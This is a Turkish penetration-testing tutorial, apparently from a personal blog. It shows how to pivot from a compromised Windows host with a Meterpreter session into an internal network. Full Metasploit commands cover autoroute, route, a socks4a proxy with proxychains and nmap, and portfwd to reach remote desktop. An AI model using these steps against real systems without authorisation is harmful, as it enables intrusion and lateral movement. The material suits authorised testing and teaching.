Swift with Furkan

Meterpreter Pivoting

Sızma testleri sırasında Meterpreter ile bağlantı kurulabilmiş olan bir bilgisayarın farklı ağlara olan erişimi olup olmadığı kontrol edilirek yeni ağlara erişim sağlanır. Bu yazıda, Meterpreter erişimi elde edilmiş bir Windows istemci üzerinden başka bir ağa erişim sağlanacak ve erişim sağlanan ağda bir takım işlemler gerçekleştirilecektir.

Bu yazıda saldırgana ait olan Kali bilgisayarın tek bir IP adresi olup bu adres 10.0.0.50’dir. Meterpreter ile erişim elde edilen Windows bilgisayarın ise, 2 ayrı ağa ait olan iki IP değeri vardır. Birincisi, saldırganın istismar ederken erişebildiği 10.0.0.25 IP adresidir. İkincisi ise, saldırgan tarafından direk olarak erişim sağlanamayan 192.168.0.80 IP adresidir.

ifconfig

Metrepreter erişimi elde edildikten sonra, Metasploit Framework ile başka bir ağa geçme işlemi için 4 temel yöntem kullanılabilir:

  1. MSF autoroute post modülü (veya Meterpreter autoroute betiği) 
  2. Meterpreter route komutu 
  3. Yönlendirme işlemi sonrasında MSF socks4a auxiliary modülü ve proxychains uygulaması 
  4. Meterpreter portfwd komutu 

1. MSF autoroute post modülü

Bu başlık altında; MSF autoroute post modülü kullanılarak, Meterpreter erişimi elde edilmiş bir Windows istemci üzerinden başka bir ağa erişim sağlanacak ve mevcut Meterpreter oturumu üzerinden ağ taraması gerçekleştirilecektir.

Windows istemci üzerinden 192.168.0.0/24 ağına erişim sağlamak için MSF autoroute post modülü seçilir ve seçenekleri incelenir.

background
route print
search autoroute
use post/windows/manage/autoroute
show options

Modüle oturum ID değeri ve erişim sağlanacak ağın bilgisi verilerek modül çalışıtırılır ve yönlendirme tablosuna yeni bir girdi eklenmiş olur.

set SESSION 1
set SUBNET 192.168.0.0/24
show options
run
route print

Not: MSF autoroute post modülü ile benzer işlevde olan Meterpreter autoroute betiği de bulunmaktadır. Ancak Meterpreter betiği yerine MSF post modülünün kullanılması tavsiye edilmektedir.

sessions -i 1
run autoroute -h
run autoroute -p

Meterpreter oturumunda yönlendirme tablosuna yeni girdi yapılmasıyla, 192.168.0.0/24 ağına gidecek taleplerin mevcut Meterpreter bağlantısı üzerinden gitmesi sağlanmıştır. Bu durumda gerçekleştirilecek olan MSF tcp auxiliary modülü ile port taraması, Meterpreter üzerinden geçecektir. Port taraması için modül seçilir, modüle tarama parametreleri verilir ve modül seçenekleri incelenir.

background
use auxiliary/scanner/portscan/tcp
set PORTS 445
set RHOSTS 192.168.0.0/24
set THREADS 50
show options

Böylece, Meterpreter üzerinden başka bir ağda tarama işlemi gerçekleştirilebilir.

run

2. Meterpreter route komutu

Bu başlık altında; Meterpreter route komutu kullanılarak, Meterpreter erişimi elde edilmiş bir Windows istemci üzerinden başka bir ağa erişim sağlanacak ve mevcut Meterpreter oturumu üzerinden ağ taraması gerçekleştirilecektir.

Windows istemci üzerinden 192.168.0.0/24 ağına erişim sağlamak için Meterpreter route komutu kullanılabilir. Bu amaçla, komutun seçenekleri incelenir, yönlendirme işlemi mevcut oturum değeri (Session ID) için gerçekleştirilir. Sonuçta da, yönlendirme tablosuna yeni bir girdi eklenmiş olur.

background
route -h
route print
route add 192.168.0.0 255.255.255.0 1
route print

Bu yöntemle de Meterpreter oturumunda yönlendirme tablosuna yeni girdi yapılmasıyla, 192.168.0.0/24 ağına gidecek taleplerin mevcut Meterpreter bağlantısı üzerinden gitmesi sağlanmıştır. Bu durumda gerçekleştirilecek olan MSF tcp auxiliary modülü ile port taraması, Meterpreter üzerinden geçecektir. Port taraması için modül tekrar yapılandırılır ve Meterpreter üzerinden başka bir ağda tarama işlemi gerçekleştirilebilir.

run

3. Yönlendirme işlemi sonrasında MSF socks4a auxiliary modülü ve proxychains uygulaması

Bu başlık altında; MSF autoroute post modülü, MSF socks4a auxiliary modülü ve Linux ProxyChains uygulaması kullanılarak, Meterpreter erişimi elde edilmiş bir Windows istemci üzerinden başka bir ağa erişim sağlanacak ve mevcut Meterpreter oturumu bir tünel olarak kullanılarak Nmap aracıyla ağ taraması gerçekleştirilecektir.

Windows istemci üzerinden 192.168.0.0/24 ağına erişim sağlamak için MSF autoroute post modülü ayarlanarak çalışıtırılır ve yönlendirme tablosuna yeni bir girdi eklenmiş olur.

show options
run
route print

Meterpreter oturumunda yönlendirme tablosuna yeni girdi yapılmasıyla, mevcut msfconsole prosesi üzerinde 192.168.0.0/24 ağına gidecek taleplerin mevcut Meterpreter bağlantısı üzerinden gitmesi sağlanmıştır. Ancak, başka bir msfconsole üzerindeki oturum veya MSF haricindeki bir araç elde edilen Meterpreter bağlantısı üzerinden işlem gerçekleştiremez. Harici araçlar ile diğer ağa (192.168.0.0/24) erişim sağlanabilmesi için, elde edilen Meterpreter bağlantısına vekil sunucu özelliği kazandırılmalıdır. Meterpreter bağlantısının vekil sunucu olarak ayarlanması için, MSF socks4a auxiliary modülü kullanılabilir. Bu amaçla, modül seçilir ve seçenekleri incelenir.

use auxiliary/server/socks4a
show options

Varsayılan port başka bir uygulama tarafından kullanılmıyorsa, modül varsayılan ayarları ile çalıştırılabilir. Böylece, modül seçeneklerinde belirtilen port üzerinde (1080) bir vekil sunucu hizmet görmeye başlar.

run
netstat -nlpt | grep 1080

SOCKS desteği olmayan uygulamaları çalıştırabilmek için, Linux ProxyChains uygulaması kullanılır. Böylece, Linux işletim sistemindeki bir aracın, mevcut vekil sunucu üzerinden geçerek çalışması sağlanır. Bu amaçla, ProxyChains yüklü değilse kurulur, sonra da konfigürasyon dosyasında (Kali için /etc/proxychains.conf) SOCKS4 sunucusunun erişim bilgileri yazılır.

socks4 127.0.0.1 1080

Böylece, Meterpreter üzerinden başka bir ağda tarama işlemi gerçekleştirilebilir.

proxychains nmap -sT -Pn -n –open -p445 192.168.0.0/24

Not: Tek bir ekran görüntüsü almak için IP aralığı filtelenmiştir.

4. Meterpreter portfwd komutu

Bu başlık altında; Meterpreter portfwd komutu kullanılarak, Meterpreter erişimi elde edilmiş bir Windows istemci üzerinden başka bir ağa yerel port yönlendirme (local port forwarding) yöntemi ile erişim sağlanacak ve mevcut Meterpreter oturumu üzerinden uzak masaüstü bağlantısı gerçekleştirilecektir.

Mevcut durumda, 192.168.0.75 IP adresli bilgisayara uzak masaüstü bağlantısı gerçekleştirilememektedir.

netstat -nlpt | grep 12345
rdesktop 192.169.0.75

Windows istemci üzerinden 192.168.0.0/24 ağına erişim sağlamak için Meterpreter portfwd komutu kullanılabilir. Bu amaçla, komutun seçenekleri incelenir, yerel port yönlendirme işlemi gerçekleştirilir. Örnek olarak, Kali bilgisayarın 12345. portuna gelen taleplerin, Meterpreter bağlantısı üzerinden 192.168.0.75 IP adresli bilgisayarın 3389. portuna yönlendirilmesi sağlanabilir. Sonuçta da, yerel port yönlendirme tablosuna yeni bir girdi eklenmiş olur.

portfwd -h
portfwd list
portfwd add -l 12345 -r 192.168.0.75 -p 3389

Meterpreter oturumunda yerel port yönlendirme tablosuna yeni girdi eklenmesiyle, Linux bilgisayar üzerindeki bir araç (rdesktop gibi) tarafından yerel bilgisayarın 12345. portuna yapılan talepler, Meterpreter bağlantısı üzerinden, 192.168.0.75 IP adresli bilgisayarın 3389. portuna gider.

netstat -nlpt | grep 12345
rdesktop 127.0.0.1:12345

Ana Sayfa

Exit mobile version